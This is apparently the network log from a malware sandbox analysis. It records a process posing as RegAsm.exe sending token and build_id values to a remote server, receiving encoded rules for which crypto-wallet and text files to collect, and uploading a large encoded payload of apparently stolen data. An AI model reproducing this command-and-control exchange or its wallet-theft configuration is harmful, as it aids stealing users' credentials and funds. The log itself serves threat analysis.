2024-04-29 20:13:32 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGCGHIDHCBFHIDGHCBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:32 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EBGCGHIDHCBFHIDGHCBKContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EBGCGHIDHCBFHIDGHCBKContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EBGCGHIDHCBFHIDGHCBKCont
2024-04-29 20:13:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:33 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49772	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:33 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:33 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------KEHDBAEGIIIEBGCAAFHICont
2024-04-29 20:13:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:34 UTC	131	IN	Data Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49773	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:35 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:35 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------KJEGDBKFIJDAKFIDGHJECont
2024-04-29 20:13:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49774	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:37 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 86161 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:37 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------IECBGIDAEHCGDGCBKEBGCont
2024-04-29 20:13:37 UTC	16355	OUT	Data Raw: 50 72 51 4d 54 48 38 36 55 45 65 31 48 61 6a 47 61 41 45 50 34 2f 57 6a 72 53 2f 68 53 55 44 45 48 57 6a 6f 50 35 30 75 63 6d 6a 72 51 41 6e 58 31 6f 37 30 64 61 4d 35 6f 41 4f 74 48 51 30 64 61 54 39 4b 41 46 2f 4c 38 4b 4f 74 42 34 49 70 50 38 6d 67 5a 33 68 71 43 54 6f 61 6e 4e 56 35 33 43 52 73 37 48 43 71 4d 6b 31 6e 4a 32 56 32 66 4d 77 54 62 73 6a 32 58 77 42 2f 79 4a 4f 6e 2f 39 74 66 38 41 30 61 39 64 4c 58 4b 2f 44 65 59 58 48 67 48 54 4a 51 4d 42 76 4e 49 48 2f 62 56 36 36 71 76 69 4b 73 6c 4b 70 4b 55 64 6d 7a 39 49 6f 30 35 55 36 63 59 54 56 6d 6b 6b 2f 6b 46 46 46 46 5a 6d 67 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 Data Ascii: PrQMTH86UEe1HajGaAEP4/WjrS/hSUDEHWjoP50ucmjrQAnX1o70daM5oAOtHQ0daT9KAF/L8KOtB4IpP8mgZ3hqCToanNV53CRs7HCqMk1nJ2V2fMwTbsj2XwB/yJOn/9tf8A0a9dLXK/DeYXHgHTJQMBvNIH/bV66qviKslKpKUdmz9Io05U6cYTVmkk/kFFFFZmgUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
2024-04-29 20:13:37 UTC	16355	OUT	Data Raw: 36 52 2f 2b 6a 45 72 78 43 45 5a 55 56 39 56 6b 48 38 4b 58 72 2b 69 50 6e 38 34 2f 69 52 39 42 2b 33 6a 69 6b 78 78 2f 68 55 75 4d 2f 6e 53 45 56 39 47 65 4b 6d 51 46 65 4b 51 72 67 56 4b 56 70 70 57 6e 59 70 53 49 38 55 6d 50 78 70 35 46 49 51 61 4c 46 58 47 67 59 70 4d 55 2f 48 34 65 39 42 58 33 6f 73 4f 34 33 46 4a 6a 38 36 64 6a 46 42 47 4b 64 67 75 52 34 48 46 49 52 6a 33 71 54 48 54 74 54 53 50 70 53 73 55 4d 4e 4a 32 36 30 37 47 61 51 6a 38 71 56 68 6a 53 4d 55 30 2f 77 43 52 54 7a 7a 54 65 66 79 71 52 6a 61 4b 57 6b 78 2f 2b 75 70 4b 45 39 4b 61 61 64 32 70 4f 74 49 59 6e 61 6b 6f 50 70 6e 46 48 47 4b 54 52 51 68 36 38 55 6e 61 6c 36 30 67 4e 53 4d 4d 65 6c 4e 7a 54 73 55 33 39 66 57 6b 4d 37 77 31 74 2b 45 46 56 74 65 32 75 6f 5a 54 43 2b 51 77 Data Ascii: 6R/+jErxCEZUV9VkH8KXr+iPn84/iR9B+3jikxx/hUuM/nSEV9GeKmQFeKQrgVKVppWnYpSI8UmPxp5FIQaLFXGgYpMU/H4e9BX3osO43FJj86djFBGKdguR4HFIRj3qTHTtTSPpSsUMNJ2607GaQj8qVhjSMU0/wCRTzzTefyqRjaKWkx/+upKE9Kaad2pOtIYnakoPpnFHGKTRQh68Unal60gNSMMelNzTsU39fWkM7w1t+EFVte2uoZTC+Qw
2024-04-29 20:13:37 UTC	16355	OUT	Data Raw: 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 78 64 61 2f 34 2f 37 48 2f 64 6b 2f 6d 6c 62 56 59 75 74 66 38 41 48 2f 59 2f 37 73 6e 38 30 6f 41 79 76 47 76 2f 41 43 49 75 6f 66 38 41 62 50 38 41 39 47 4c 58 6c 4e 76 39 30 56 36 74 34 31 2f 35 45 58 55 50 2b 32 66 2f 41 4b 4d 57 76 4b 62 63 66 4b 4b 2b 68 79 62 2b 48 4c 31 50 6e 73 35 2f 69 52 39 43 79 50 35 55 74 48 34 30 44 6d 76 63 50 44 43 6a 50 4f 61 57 6b 6f 41 4d 55 43 6c 78 52 51 41 43 72 75 6c 38 33 5a 2f 36 35 76 38 41 2b 67 6d 71 66 39 4b 75 61 59 43 Data Ascii: AKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKxda/4/7H/dk/mlbVYutf8AH/Y/7sn80oAyvGv/ACIuof8AbP8A9GLXlNv90V6t41/5EXUP+2f/AKMWvKbcfKK+hyb+HL1Pns5/iR9CyP5UtH40DmvcPDCjPOaWkoAMUClxRQACrul83Z/65v8A+gmqf9KuaYC
2024-04-29 20:13:37 UTC	16355	OUT	Data Raw: 2f 37 48 2f 64 6b 2f 6d 6c 41 47 46 38 51 2f 38 41 6b 6e 47 71 2f 77 43 37 48 2f 36 4e 53 76 41 6f 2b 6c 65 2b 2f 45 50 2f 41 4a 4a 78 71 76 38 41 75 78 2f 2b 6a 55 72 77 47 4c 6f 4b 2b 68 79 62 2b 48 4c 31 50 45 7a 54 34 31 36 45 77 6f 36 55 43 69 76 63 50 4a 51 68 6f 50 53 67 6d 6b 6f 47 4a 51 66 70 52 52 51 4d 53 6c 35 6f 37 30 6c 41 77 4e 49 61 4d 38 30 5a 35 6f 47 4a 2b 74 46 47 65 4b 50 30 2b 74 41 77 36 55 6c 47 4d 38 55 6d 63 65 74 41 42 53 5a 70 61 51 48 33 6f 4b 44 4a 7a 31 70 44 6b 30 44 48 61 67 38 30 44 44 4f 66 72 53 64 2b 31 4c 2b 6c 4a 6d 67 41 50 54 69 6b 36 63 30 5a 79 50 38 41 47 6b 4e 41 78 61 54 4f 52 78 52 6b 39 50 30 6f 6f 41 51 2f 35 4e 46 48 62 70 2b 56 42 6f 47 65 69 48 70 55 45 6e 53 70 7a 30 71 43 54 70 57 4d 6a 35 4f 4f 35 36 Data Ascii: /7H/dk/mlAGF8Q/8AknGq/wC7H/6NSvAo+le+/EP/AJJxqv8Aux/+jUrwGLoK+hyb+HL1PEzT416Ewo6UCivcPJQhoPSgmkoGJQfpRRQMSl5o70lAwNIaM80Z5oGJ+tFGeKP0+tAw6UlGM8UmcetABSZpaQH3oKDJz1pDk0DHag80DDOfrSd+1L+lJmgAPTik6c0ZyP8AGkNAxaTORxRk9P0ooAQ/5NFHbp+VBoGeiHpUEnSpz0qCTpWMj5OO56
2024-04-29 20:13:37 UTC	4386	OUT	Data Raw: 6a 36 74 59 6c 6c 76 6d 46 37 63 74 6d 47 5a 76 49 63 67 78 66 75 31 78 30 4a 2b 38 31 65 4a 30 55 32 72 67 6d 65 7a 61 4f 2b 6a 54 36 4a 2f 77 41 4a 46 4a 39 6e 69 30 2b 2f 31 69 78 65 39 67 59 2f 4a 62 7a 71 5a 50 4d 42 42 2f 67 4a 4b 75 50 5a 73 64 71 35 58 58 39 41 76 4c 58 77 31 71 32 70 36 30 6d 71 57 2b 70 76 71 4b 44 7a 4a 35 68 39 6e 76 38 41 64 35 68 33 6f 4e 76 7a 62 52 30 59 4d 77 77 33 62 4e 63 48 52 53 73 4f 34 55 55 6c 4c 56 43 45 72 74 50 44 31 68 39 68 38 50 79 36 76 5a 33 4f 6d 79 36 70 63 70 4e 62 70 48 50 71 55 45 42 74 49 79 75 31 6e 4b 4f 36 73 7a 73 43 77 58 48 41 36 38 6b 6a 48 47 55 55 6d 42 36 52 62 78 2f 38 49 76 42 59 32 39 68 72 65 6d 32 31 75 5a 34 72 6d 38 31 61 4b 37 67 75 6e 38 7a 59 51 71 70 62 71 78 66 59 6d 39 67 63 71 Data Ascii: j6tYllvmF7ctmGZvIcgxfu1x0J+81eJ0U2rgmezaO+jT6J/wAJFJ9ni0+/1ixe9gY/JbzqZPMBB/gJKuPZsdq5XX9AvLXw1q2p60mqW+pvqKDzJ5h9nv8Ad5h3oNvzbR0YMww3bNcHRSsO4UUlLVCErtPD1h9h8Py6vZ3Omy6pcpNbpHPqUEBtIyu1nKO6szsCwXHA68kjHGUUmB6Rbx/8IvBY29hrem21uZ4rm81aK7gun8zYQqpbqxfYm9gcq
2024-04-29 20:13:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49775	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:39 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJJECBKKECFIEBGCAKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:39 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EHJJECBKKECFIEBGCAKJCont
2024-04-29 20:13:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49776	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:41 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBAKKFCBFHIIEBGIDBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:41 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------AFBAKKFCBFHIIEBGIDBGContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------AFBAKKFCBFHIIEBGIDBGContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------AFBAKKFCBFHIIEBGIDBGCont
2024-04-29 20:13:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49777	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:56 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RauG9dSpKm2dhpW&MD=978uZbzx HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-29 20:13:56 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 67ff6b0d-7578-4e4c-93c7-ffd3a3fb0b5a MS-RequestId: c5e9865b-5127-4a5e-b3de-bd74e1cec018 MS-CV: R3jVW9Pe/02rlwOC.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 29 Apr 2024 20:13:55 GMT Connection: close Content-Length: 25457
2024-04-29 20:13:56 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-29 20:13:56 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: 